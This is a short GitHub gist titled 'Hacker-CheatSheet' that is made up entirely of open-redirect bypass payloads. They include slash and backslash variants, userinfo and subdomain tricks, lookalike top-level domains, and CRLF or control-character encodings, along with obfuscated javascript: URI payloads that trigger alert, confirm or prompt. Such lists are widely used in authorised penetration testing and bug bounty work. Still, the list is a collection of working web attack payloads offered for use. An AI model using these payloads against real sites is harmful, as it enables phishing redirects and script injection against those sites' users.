Created
January 31, 2022 19:33
-
-
Save ShivamRawat0l/41d1e81934ed00009271dcba5b9890e6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Hacker-CheatSheet | |
This repo contains cheatsheet for hackers | |
Open Url Redirects | |
> \/yoururl.com | |
> \/\/yoururl.com | |
> \\yoururl.com | |
> //yoururl.com | |
> //theirsite@yoursite.com | |
> https://yoursite?c=.theirsite.com/ | |
> https://yoursite.com#.theirsite.com/ | |
> https://yoursite.com\.thersite.com/ | |
> //%2F/yoursite.com | |
> ////yoursite.com | |
> https://theirsite.computer/ (if they just check for *theirsite.com*, .computer is a valid tld!) | |
> https://theirsite.com.mysite.com (Treat their domain as subdomain to yours) | |
> /%0D/yoursite.com (Also try %09, %00, %0a, %07) | |
> java%0d%0ascript%0d%0a:alert(0), j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0` ,java%07script:prompt`0` ,java%09scrip%07t:prompt`0` | |
> /%2F/yoururl.com | |
> /%5Cyoururl.com | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment